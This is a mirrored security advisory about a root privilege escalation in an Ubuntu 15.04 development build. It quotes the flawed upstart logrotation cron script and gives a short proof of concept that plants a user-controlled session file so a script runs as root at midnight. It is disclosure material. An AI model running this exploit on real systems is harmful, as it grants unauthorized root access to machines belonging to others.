Ubuntu 15.04 (Development) – ‘Upstart’ Logrotation Privilege Escalation

  • 作者: halfdog
    日期: 2015-03-12
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/41765/
  • Source: http://www.halfdog.net/Security/2015/UpstartLogrotationPrivilegeEscalation/
    ## Introduction
    Problem description: Ubuntu Vivid 1504 (development branch) installs an insecure upstart logrotation script which will read user-supplied data from /run/user/[uid]/upstart/sessions and pass then unsanitized to an env command. As user run directory is user-writable, the user may inject arbitrary commands into the logrotation script, which will be executed during daily cron job execution around midnight with root privileges.
    ## Methods
    The vulnerability is very easy to trigger as the logrotation script /etc/cron.daily/upstart does not perform any kind of input sanitation:
    # For each Upstart Session Init, emit "rotate-logs" event, requesting
    # the session Inits to rotate their logs. There is no user-daily cron.
    # Doing it this way does not rely on System Upstart, nor
    # upstart-event-bridge(8) running in the Session Init.
    # Note that system-level Upstart logs are handled separately using a
    # logrotate script.
    [ -x /sbin/initctl ] || exit 0
    for session in /run/user/*/upstart/sessions/*
    env $(cat $session) /sbin/initctl emit rotate-logs >/dev/null 2>&1 || true
    On a system with e.g. libpam-systemd installed, standard login on TTY or via SSH will create the directory /run/user/[uid] writable to the user. By preparing a suitable session file, user supplied code will be run during the daily cron-jobs. Example:
    cat <<EOF > "${HOME}/esc"
    touch /esc-done
    chmod 0755 "${HOME}/esc"
    mkdir -p /run/user/[uid]/upstart/sessions
    echo "- ${HOME}/esc" > /run/user/[uid]/upstart/sessions/x